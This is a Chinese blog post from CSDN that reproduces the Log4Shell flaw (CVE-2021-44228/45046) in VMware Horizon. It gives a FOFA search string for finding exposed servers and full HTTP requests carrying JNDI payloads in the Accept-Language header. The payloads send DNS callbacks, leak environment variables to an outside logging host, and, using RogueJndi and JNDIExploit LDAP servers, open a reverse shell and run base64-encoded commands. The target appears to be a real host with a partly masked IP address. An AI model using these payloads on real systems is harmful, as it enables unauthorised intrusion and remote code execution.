VMware 多个产品LOG4J2远程代码执行漏洞-(CVE-2021-44228/CVE-2021-45046)

最新推荐文章于 2024-01-23 16:08:23 发布
最新推荐文章于 2024-01-23 16:08:23 发布
阅读量1.1k 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: log4j 安全 web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tamchikit/article/details/128544719
版权

漏洞编号

  • CVE-2021-44228

  • CVE-2021-45046

靶机环境

0x00 漏洞简介

2021年12月14日,某平台监测到VMware 发布安全通告,VMware的众多产品受Apache Log4j2远程代码执行漏洞(CVE-2021-44228)的影响。由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特别构造的数据请求包,可在受影响的 VMware 产品中执行任意代码。漏洞PoC已公开,且发现在野利用,建议相关用户尽快采取措施进行排查与防护。

0x01 漏洞影响

VMware Horizon 8.x, 7.x

VMware vCenter Server 7.x, 6.x

VMware HCX 4.x, 3.x

VMware NSX-T Data Center 3.x, 2.x

VMware Unified Access Gateway 21.x, 20.x, 3.x

VMware Workspace ONE Access 21.x, 20.10.x

VMware Identity Manager 3.3.x

VMware vRealize Operations 8.x

VMware vRealize Operations Cloud Proxy Any

VMware vRealize Log Insight 8.x

VMware Carbon Black Cloud Workload Appliance 1.x

VMware Carbon Black EDR Server 7.x, 6.x

VMware Tanzu GemFire 9.x, 8.x

VMware Tanzu Greenplum 6.x

VMware Tanzu Operations Manager 2.x

VMware Tanzu Application Service for VMs 2.x

VMware Tanzu Kubernetes Grid Integrated Edition 1.x

VMware Cloud Foundation4.x, 3.x

VMware Workspace ONE Access Connector (VMware Identity Manager Connector) 21.x, 20.10.x, 19.03.0.1

VMware Horizon DaaS 9.1.x, 9.0.x

VMware NSX Data Center for vSphere

VMware AppDefense Appliance

0x02 漏洞限制

暂无

0x03 复现过程

漏洞复现

fofa语法:

title="Vmware Horizon"

页面如下:

判断是否存在漏洞的请求包,在 DNSLog 中查找 DNS 回调。DNS 交互表明主机确实是可利用的。

GET /portal/info.jsp?_=1664327330894 HTTP/1.1
Host: 180.xxx.xxx.108
Cookie: JSESSIONIDHTMLACCESS=3F6893EF589244DC148FDA5272966312; JSESSIONID=90FD7B8AB5526BC30F39472D0761F268; CID=BAAAAMPMXPEN5Zng7zRUx5+kums=
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ${jndi:ldap://xgjizf.dnslog.cn}
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: https://180.xxx.xxx.108/portal/webclient/index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

发送下面的数据包可以获得Windows系统环境变量信息:

GET /portal/info.jsp HTTP/1.1
Host: 180.xxx.xxx.108
Cookie: JSESSIONIDHTMLACCESS=3F6893EF589244DC148FDA5272966312; JSESSIONID=90FD7B8AB5526BC30F39472D0761F268; CID=BAAAAMPMXPEN5Zng7zRUx5+kums=
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ${jndi:ldap://${env:os}.4xy3g6.ceye.io}
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: https://180.xxx.xxx.108/portal/webclient/index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

下面是返回包:

HTTP/1.1 200 OK
Content-Type: application/json;charset=ISO-8859-1
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: child-src 'self' blob:;default-src 'self';connect-src 'self' wss:;font-src 'self' data:;img-src 'self' data: blob:;media-src 'self' blob:;object-src 'self' blob:;script-src 'self' 'unsafe-inline' 'unsafe-eval' data:;style-src 'self' 'unsafe-inline';frame-ancestors 'self'
X-Content-Type-Options:  nosniff

{"acceptLanguage":"${jndi:ldap://${env:os}.xxx.ceye.io}","clientVersion":"5.2.0","logLevel":"2","contextPath":"/portal","feature":{},"os":"linux64","installerLink":"https://www.vmware.com/go/viewclients#linux64"}

可以通过Dnslog外带获取返回信息:

PoC/Exp

使用下面的Poc/Exp进行漏洞利用:

工具一:RogueJndi-1.1(注意node.exe路径可能不同或者靶机不出网,导致无法反弹shell成功):

进行base64编码后执行powershell:

开启1234端口监听,构造如下请求包即可反弹shell

GET /portal/info.jsp HTTP/1.1
Host: 180.xxx.xxx.108
Cookie: JSESSIONIDHTMLACCESS=3F6893EF589244DC148FDA5272966312; JSESSIONID=90FD7B8AB5526BC30F39472D0761F268; CID=BAAAAMPMXPEN5Zng7zRUx5+kums=
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ${jndi:ldap://1.xxx.xxx.xxx:1389/o=tomcat}
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: https://180.xxx.xxx.108/portal/webclient/index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

工具二:JNDIExploit1.4

将命令进行base64编码后并构造如下请求包可以进行远程命令执行:

GET /portal/info.jsp HTTP/1.1
Host: 180.xxx.xxx.108
Cookie: JSESSIONIDHTMLACCESS=3F6893EF589244DC148FDA5272966312; JSESSIONID=90FD7B8AB5526BC30F39472D0761F268; CID=BAAAAMPMXPEN5Zng7zRUx5+kums=
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ${jndi:ldap://1.xxx.xxx.xxx:1389/Basic/Command/Base64/cGluZyB0dHQudXVhM3hkYm4uZXZlcy5zaA==}
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: https://180.xxx.xxx.108/portal/webclient/index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

0x04 参考链接

tamchikit
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
然而,2021 年底,Log4j 发现了一个严重的安全漏洞,被称为 CVE-2021-44228(也称为 Log4Shell),这使得攻击者可以通过在日志记录中注入恶意代码远程执行任意代码,从而对受影响的系统造成严重威胁。 此漏洞源于...
vCenter修复Apache log4j2漏洞CVE-2021-44228, CVE-2021-45046
qq_27248929的博客
12-21 4514
2021年12月Apache log4j远程执行漏洞影响到的VMware产品列表:VMSA-2021-0028.4 (vmware.com)。 本次我们所涉及到的产品及版本是vSphere6.7下的vCenter Server Application6.7.x,以下是加固的配置步骤: 1)首先打开vCenter的shell连接,需从控制台进入vCenter虚机进行配置操作,具体为进入排错模式,Enable shell和SSH选项; 2)打开xshell 通过SSH连接vCenter进行命令行.
Apache Log4j2 Lookup 代码执行与拒绝服务漏洞(CVE-2021-45046)
weixin_44047654的博客
12-13 1685
Apache Log4j2 Lookup 代码执行与拒绝服务漏洞(CVE-2021-45046)
Log4j2 CVE-2021-45046 鸡肋RCE漏洞复现与浅析
mole_exp的博客
12-21 4131
文章目录0x00 前言 0x00 前言 自从上上周四(12月9日晚)Log4Shell(CVE-2021-44228漏洞被披露后引发了安全圈地震,笔者就立刻对该漏洞进行复现和分析,并持续跟踪这个漏洞后续的资讯动态。
spring-boot-starter-log4j2漏洞修复方式
dhj8933的博客
12-14 4075
spring-boot-starter-log4j2漏洞修复方式
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 6653
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Horizon DAAS环境Log4J远程代码执行漏洞危害减轻措施
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
04-12 4821
一、问题描述 2021 年 12 月 9 日,VMware 威胁分析部门 (TAU) 也注意到Java Log4j 模块中存在的一个大规模、高影响的漏洞。此漏洞称为 Log4Shell,安全跟踪编码为 CVE-2021-44228及后续衍生的 CVE-2021-45046。它是一个未经身份验证的远程代码执行 (RCE) 漏洞。它允许攻击者通过简单地让他们记录特定字符串来在受影响的系统和工作负载上运行命令。进行日志记录的库将该字符串解释为命令,而不是仅仅将其写入日志。例如,攻击者可能利用web门户的登录页面,
Apache Log4j2 远程代码执行漏洞检测工具
12-15
然而,在2021年12月初,一个严重的安全漏洞CVE-2021-44228)被公开,这个漏洞被称为"Log4Shell",允许攻击者通过注入恶意的JNDI(Java Naming and Directory Interface)链接来执行远程代码,对受影响的系统造成...
Apache Log4j 2 源代码( apache-log4j-2.17.1-src.tar.gz)
01-07
Apache Log4j 2 源代码( apache-log4j-2.17.1-src.tar.gz) 是对 Log4j 的升级,它比其前身 Log4j 1.x 提供了重大改进,并提供了 Logback 中可用的许多改进,同时修复了 Logback 架构中的一些固有问题。修复了安全...
log4j学习笔记(二)——log4j.xml的配置
Horizon_LGMH的博客
10-10 658
作为一只小菜,总是觉得日志是一个很吊的东西。之前的日志都是师傅们配的,趁着有空想好好学一下,但是看帖子呀教程呀讲的确实对我这种菜鸟帮助不多,老大让我去看文档,英文的看得我一脸懵逼,没办法,跟中文的对比着好好学了一下,写出来希望对自己,也对跟我一样想学又对英文文档有点怵的小伙伴有些帮助。 一、三个首要组件之一:Logger 从 log4j的1.2版本起,Logger已经取代了Ca
CVE-2022-22972 VMware Workspace ONE Access 身份认证绕过漏洞分析
顶峰
01-30 1105
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
Vector关于Apache Log4Shell CVE-2021-45105,CVE-2021-45046CVE-2021-44228安全漏洞配合与修复全面详解
Polelink北汇信息的博客
12-30 3259
Apache Log4j2 是一个基于 Java 的日志记录开源组件。近日,Log4j2 被爆出现安全漏洞,攻击者可以通过向易受攻击的服务器或应用程序发送操纵请求来利用安全漏洞。Vector 德国PREEvison产品团队已经通过官网和客户管理系统及时通知客户,有关PREEvision中使用的软件组件的严重安全漏洞“Log4Shell”CVE-2021-44228,说明如下:
漏洞修复】Apache Log4j 远程代码执行漏洞(CVE-2021-44228CVE-2021-45046)
最新发布
m0_52985087的博客
01-23 1000
本文档适用于OpenEuler20、OpenEuler21、OpenEuler22、麒麟V10 SP3、统信V10操作系统,修复Log4漏洞
复现CVE-2021-44228-Apache Log4j2远程代码执行漏洞
Jietewang的博客
12-19 9012
复现CVE-2021-44228-Apache Log4j2远程代码执行漏洞 目录 前言 漏洞原理 影响范围 环境搭建&漏洞复现 使用工具JNDIExploit-1.2-SNAPSHOT.jar 前言 近期Apache Log4j2被暴露了一个严重的远程代码执行安全漏洞CVE-2021-44228),有严重的安全风险。Apache Log4j2是一款优秀的Java日志框架, 被广泛地应用在中间件、开发框架与Web应用中。2021年11月24日,阿里云安全团队向apache官方.
CVE-2022-22954 VMware Workspace ONE Access SSTI RCE 漏洞分析
wangluo12138的博客
02-02 730
CVE-2022-22954 VMware Workspace ONE Access SSTI RCE 漏洞分析
Log4j修复——Vmware Horizon
穿越千年的泪
12-28 3272
项目场景: vmware Horizon 修复 Log4j漏洞,缓解措施 Log4j CVE-2021-44228 and CVE-2021-45046 解决方案: 一、不易受影响的组件 Horizon Recording Server Horizon Recording Agent Windows Agent Direct Connect GPO Bundle Enrollment Server JMP Server Persona Agent View Composer Uni
Apache Log4j2远程代码执行漏洞CVE-2021-44228)复现
qq_40640917的博客
01-10 2476
Apache Log4j2 存在远程代码执行漏洞,该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。Apache Log4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。攻击机参数:Kali(或安装有msfconsole的任意Linux/Windows操作系统)靶机容器:vulfocus/log4j2-rce-2021-12-09。靶机参数:Centos8.1。
elasticsearch Apache Log4j 远程代码执行漏洞(CVE-2021-44228CVE-2021-45046)
03-07
这是一个安全漏洞问题,我可以回答。elasticsearch和Apache Log4j都存在远程代码执行漏洞(CVE-2021-44228CVE-2021-45046),攻击者可以利用这些漏洞在受影响的系统上执行任意代码。建议用户尽快更新相关软件版本或采取其他安全措施来保护系统安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值